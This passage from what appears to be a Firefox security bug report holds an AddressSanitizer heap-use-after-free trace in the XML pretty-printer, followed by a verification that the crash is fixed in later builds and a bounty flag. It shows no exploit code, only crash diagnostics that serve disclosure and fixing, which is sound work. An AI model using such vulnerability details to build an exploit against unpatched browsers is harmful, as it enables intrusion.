    #5 0x7f0f3c6d8725 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #6 0x7f0f3c6de48c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #7 0x7f0f3c606f46 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15
    #8 0x7f0f3ab13fa5 in nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:878:18
    #9 0x7f0f3ab1437f in non-virtual thunk to nsBaseChannel::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:864:16
    #10 0x7f0f3ab617c6 in nsInputStreamPump::OnStateStop() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:704:20
    #11 0x7f0f3ab5fb96 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:428:25
    #12 0x7f0f3a950c2d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #13 0x7f0f3a992a81 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #14 0x7f0f3a9b7ab6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #15 0x7f0f3a9d1f78 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #16 0x7f0f3b7a4771 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #17 0x7f0f3b704d7b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #18 0x7f0f3b704d7b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #19 0x7f0f3b704d7b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #20 0x7f0f41191cdf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #21 0x7f0f454adf97 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #22 0x7f0f3b704d7b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f0f3b704d7b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f0f3b704d7b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f0f454ad94a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #26 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #27 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #28 0x7f0f585db82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
    #29 0x41dbc8 in _start (/home/bogdan.maris/Documents/Asasasan/firefox/firefox+0x41dbc8)

0x622000000100 is located 0 bytes inside of 5768-byte region [0x622000000100,0x622000001788)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f0f418f779e in mozilla::PresShell::Release() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:840:1
    #2 0x7f0f41a0144b in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:355:7
    #3 0x7f0f41a0144b in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:631
    #4 0x7f0f41a0144b in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4645
    #5 0x7f0f419f8774 in nsDocumentViewer::Hide() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2245:3
    #6 0x7f0f44a8c2c9 in SetVisibility /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6612:9
    #7 0x7f0f44a8c2c9 in non-virtual thunk to nsDocShell::SetVisibility(bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:6602
    #8 0x7f0f3d8705fa in nsFrameLoader::Hide() /builds/worker/workspace/build/src/dom/base/nsFrameLoader.cpp:1467:12
    #9 0x7f0f41d5f7e0 in nsSubDocumentFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsSubDocumentFrame.cpp:1029:22
    #10 0x7f0f41cf4bec in nsLineBox::DeleteLineList(nsPresContext*, nsLineList&, nsIFrame*, nsFrameList*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsLineBox.cpp:402:14
    #11 0x7f0f41b1e977 in nsBlockFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsBlockFrame.cpp:331:3
    #12 0x7f0f41b1f4dd in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #13 0x7f0f41b1f4dd in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #14 0x7f0f41b7c1b9 in nsCanvasFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsCanvasFrame.cpp:160:21
    #15 0x7f0f41b1f4dd in DestroyFramesFrom /builds/worker/workspace/build/src/layout/generic/nsFrameList.cpp:59:12
    #16 0x7f0f41b1f4dd in nsContainerFrame::DestroyFrom(nsIFrame*, mozilla::layout::PostFrameDestroyData&) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:226
    #17 0x7f0f41a12934 in nsIFrame::Destroy() /builds/worker/workspace/build/src/layout/generic/nsIFrame.h:674:5
    #18 0x7f0f41b93602 in nsContainerFrame::RemoveFrame(mozilla::layout::FrameChildListID, nsIFrame*) /builds/worker/workspace/build/src/layout/generic/nsContainerFrame.cpp:174:16
    #19 0x7f0f419ce368 in RemoveFrame /builds/worker/workspace/build/src/layout/base/nsFrameManager.cpp:535:18
    #20 0x7f0f419ce368 in nsCSSFrameConstructor::ContentRemoved(nsIContent*, nsIContent*, nsIContent*, nsCSSFrameConstructor::RemoveFlags) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:8820
    #21 0x7f0f419ba424 in nsCSSFrameConstructor::RecreateFramesForContent(nsIContent*, nsCSSFrameConstructor::InsertionKind) /builds/worker/workspace/build/src/layout/base/nsCSSFrameConstructor.cpp:10020:7
    #22 0x7f0f418e6f5a in mozilla::RestyleManager::ProcessRestyledFrames(nsStyleChangeList&) /builds/worker/workspace/build/src/layout/base/RestyleManager.cpp:1513:25
    #23 0x7f0f4195cafa in mozilla::ServoRestyleManager::DoProcessPendingRestyles(mozilla::ServoTraversalFlags) /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1159:9
    #24 0x7f0f4191ba20 in ProcessPendingRestyles /builds/worker/workspace/build/src/layout/base/ServoRestyleManager.cpp:1235:3
    #25 0x7f0f4191ba20 in ProcessPendingRestyles /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RestyleManagerInlines.h:44
    #26 0x7f0f4191ba20 in mozilla::PresShell::DoFlushPendingNotifications(mozilla::ChangesToFlush) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:4196
    #27 0x7f0f3d7d9be0 in FlushPendingNotifications /builds/worker/workspace/build/src/obj-firefox/dist/include/nsIPresShell.h:572:5
    #28 0x7f0f3d7d9be0 in nsDocument::FlushPendingNotifications(mozilla::FlushType, mozilla::FlushTarget) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:8547
    #29 0x7f0f41666087 in nsComputedDOMStyle::UpdateCurrentStyleSources(bool) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:946:13
    #30 0x7f0f41667bf1 in nsComputedDOMStyle::GetPropertyCSSValue(nsTSubstring<char16_t> const&, mozilla::ErrorResult&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:1160:3
    #31 0x7f0f41665738 in nsComputedDOMStyle::GetPropertyValue(nsTSubstring<char16_t> const&, nsTSubstring<char16_t>&) /builds/worker/workspace/build/src/layout/style/nsComputedDOMStyle.cpp:479:26
    #32 0x7f0f40d12b9e in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*) /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:81:28
    #33 0x7f0f40d122ff in nsXMLContentSink::MaybePrettyPrint() /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:214:17
    #34 0x7f0f40d157c4 in nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:306:5
    #35 0x7f0f40d15dc3 in non-virtual thunk to nsXMLContentSink::DidBuildModel(bool) /builds/worker/workspace/build/src/dom/xml/nsXMLContentSink.cpp:264:19
    #36 0x7f0f3c6d8725 in DidBuildModel /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:491:37
    #37 0x7f0f3c6d8725 in nsParser::ResumeParse(bool, bool, bool) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1101
    #38 0x7f0f3c6de48c in nsParser::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/parser/htmlparser/nsParser.cpp:1475:10
    #39 0x7f0f3c606f46 in nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:357:15

previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f0f3d7a5733 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f0f3d7a5733 in nsDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:4146
    #4 0x7f0f419f413f in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:684:27
    #5 0x7f0f419f3a0f in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:942:10
    #6 0x7f0f419f2c77 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped<mozilla::gfx::UnknownUnits> const&) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:659:10
    #7 0x7f0f44a940db in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9558:7
    #8 0x7f0f44a92a9c in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7382:17
    #9 0x7f0f44a2b805 in nsDocShell::CreateContentViewer(nsTSubstring<char> const&, nsIRequest*, nsIStreamListener**) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9365:3
    #10 0x7f0f44a29110 in nsDSURIContentListener::DoContent(nsTSubstring<char> const&, bool, nsIRequest*, nsIStreamListener**, bool*) /builds/worker/workspace/build/src/docshell/base/nsDSURIContentListener.cpp:196:21
    #11 0x7f0f3c60764a in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:739:28
    #12 0x7f0f3c604df3 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:417:30
    #13 0x7f0f3c60381b in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsURILoader.cpp:295:8
    #14 0x7f0f3ab135b7 in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/base/nsBaseChannel.cpp:859:25
    #15 0x7f0f3ab60472 in nsInputStreamPump::OnStateStart() /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:518:25
    #16 0x7f0f3ab5fafe in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/workspace/build/src/netwerk/base/nsInputStreamPump.cpp:421:25
    #17 0x7f0f3a950c2d in nsInputStreamReadyEvent::Run() /builds/worker/workspace/build/src/xpcom/io/nsStreamUtils.cpp:97:20
    #18 0x7f0f3a992a81 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #19 0x7f0f3a9b7ab6 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #20 0x7f0f3a9d1f78 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #21 0x7f0f3b7a4771 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #22 0x7f0f3b704d7b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #23 0x7f0f3b704d7b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #24 0x7f0f3b704d7b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #25 0x7f0f41191cdf in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #26 0x7f0f454adf97 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #27 0x7f0f3b704d7b in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #28 0x7f0f3b704d7b in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #29 0x7f0f3b704d7b in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #30 0x7f0f454ad94a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #31 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #32 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #33 0x7f0f585db82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/xml/nsXMLPrettyPrinter.cpp:157:16 in nsXMLPrettyPrinter::PrettyPrint(nsIDocument*, bool*)
Shadow bytes around the buggy address:
  0x0c447fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c447fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c447fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c447fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c447fff8020:[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8040: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447fff8070: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==3249==ABORTING
[Parent 2993, Gecko_IOThread] WARNING: pipe error (115): Connection reset by peer: file /builds/worker/workspace/build/src/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 353

I verified that the crash no longer reproduces with the latest Nightly 59.0a1 and the latest 58.0 ASAN build on Ubuntu 16.04 64-bit, and with the regular latest Nightly 59.0a1 and 58.0 RC on macOS 10.13.2 and Windows 10 64-bit.
Status: RESOLVED → VERIFIED
status-firefox58: fixed → verified
status-firefox59: fixed → verified
Flags: qe-verify+
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty+
Group: core-security-release